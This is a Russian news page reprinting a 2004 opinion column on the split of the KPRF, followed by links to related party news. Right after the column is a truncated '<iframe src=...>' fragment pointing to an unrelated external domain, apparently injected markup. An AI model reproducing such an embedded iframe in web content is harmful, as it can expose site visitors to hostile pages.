20.07.2004, 11:25

«Уральский рабочий»: Урок не впрок

В последние дни у меня на душе такое чувство, словно потерял родного человека. Причем нелюбимого. И все-таки жаль его. Ведь столько лет прожили вместе. Почти всю жизнь. Всякое было — хорошее и дурное. Даже трудно сказать, чего больше.
Я о стремительном распаде КПРФ. Существовала она всего 11 лет, но ведь это наследница КПСС, которой было за семьдесят и в которой состояло почти два десятка миллионов человек, причем лучших людей огромной страны, как бы там потом ни говорили и как бы их ни обзывали.
Сегодня только ленивый не бросит камень в КПРФ, которая раскололась на две партии: прошло два десятых съезда, причем в один и тот же день, 3 июля, избрано два разных лидера — прежний Геннадий Зюганов и новый ивановский губернатор Владимир Тихонов. Впрочем, «Уральский рабочий» об этом уже сообщал, как и о снятии с должности первого секретаря Свердловского обкома КПРФ Владимира Кадочникова. Теперь впереди неизбежный бракоразводный процесс с публичной демонстрацией семейных дрязг и грязного белья.
Бедная, жалкая партия. А ведь какое было героическое начало! Сколько стихов, сколько песен сложено. И жить собиралась вечно. Но вечных партий не бывает, как мы убедились уже раз. В отличие от ошибок, которые они делают, повторяя их вновь и вновь. Урок ну никак не идет им впрок.
Общество жить без партий не может, как стадо коров без пастуха, — это ясно всем. Помнится, я в КПСС вступил девятнадцати лет от роду, когда матросом служил на Балтийском море, в славной героической бригаде подводных лодок. Уже наслышан был о неблаговидных историях 37 года, о деспотизме Сталина и Берии и других некрасивых делах знаменитых большевиков, и все-таки вступление в партию — это было нечто. Гордость так и распирала матросскую грудь, обтянутую тельняшкой.
Однажды на лодке случилось ЧП в торпедном отсеке. Работа предстояла сложная и опасная. Замполит, естественно, обратился к экипажу: «Коммунисты, вперед!» И отказчиков не оказалось. Что случилось с партией потом, дело известное. Но не рядовые коммунисты в этом виноваты.
Партии жаждут власти. Для этого они и создаются. Они пожирают власть, как
акулы мясо. А чтобы захватить и удержать ее, готовы на все, на любимые сказочки для подданных, которые им верят. Правда, до поры до времени. Я, например, совершенно искренне считал, что доживу до благословенного коммунизма или хотя бы до собственной роскошной квартиры. Помните, была такая программа — к 2000 году каждого советского человека обеспечить достойным жильем.
Так вот, урок первый и главный — чтобы подольше жить, надо поменьше сочинять всякие приятные народу небылицы. Это и нынешним добрым молодцам урок, которые вознамерились и бедность извести, и доступным жильем россиян обеспечить. Это, конечно, не коммунизм. Но лиха беда — начало. Войдут во вкус, еще не то наобещают.
Урок второй — надо быть терпимым к инакомыслящим. В последние дни наши местные партийные лидеры уж слишком разбушевались. Чуть не то сказал или не так проголосовал в областной Думе — из партии долой. Чем все это заканчивается, тоже хорошо известно. Я думаю, слово ГУЛАГ еще не забыли.
Урок третий — необязательно всякого чиновника ставить в стройные партийные шеренги. А это тоже наблюдается. По-моему, весной происходил массовый призыв в ряды партии, которая намерена стать правящей. Впрочем, желающих порулить у нас хватает. Я их и называть не буду. Чтобы не обидеть ненароком. А то ведь биография у них недолгая, судя по всему. КПРФ рядом с ними — долгожитель.
<iframe src="http://nemohuildiin

Похожие новости по теме
15.08.2007, 14:03

Зюганов получит Артюха, но потеряет партию

Как стало известно ИА «Политсовет» из собственных источников, в первичных ячейках Коммунистической партии РФ в Свердловской области продолжается мощная волна недовольства нынешним руководством...

22.01.2007, 16:10

Зюганов предложил всем коммунистам бывшего СССР объединиться

Политсовет, 22.01.2007. «Всем партиям, образованным на территории бывшего СССР и придерживающимся коммунистических взглядов, нужно объединиться», — сказал лидер КПРФ Геннадий Зюганов, выступая...

19.06.2006, 14:20

Существование КПРФ под вопросом

Политсовет, Москва, 19.06.2006. На последнем пленуме КПРФ Геннадий Зюганов привел шокирующие факты. Оказывается, партийные списки политического движения с каждым годом редеют. В 2005 году партийные...

20.01.2006, 10:14

Секретарь городского комитета КПРФ Людмила Журавлева: Минюст по Свердловской области вынесен очередное предписание, на ликвидацию которого мы сейчас и работаем

Как сообщало ранее ИА «Политсовет», лидер КПРФ Геннадий Зюганов заявил, что КПРФ стало первой партией, перерегистрированная Минюстом. По достоверным источникам близким к свердловскому обкому партии...

26.11.2002, 10:40

Уральские коммунисты опять без лидера

23 ноября депутат Свердловской областной Думы Вячеслав Тепляков вновь был отстранен от должности первого секретаря Екатеринбургского городского комитета Коммунистической партии РФ и выведен из...


Мастрид
Погода на неделю
Популярные новости
Новости по дням
Новости по месяцам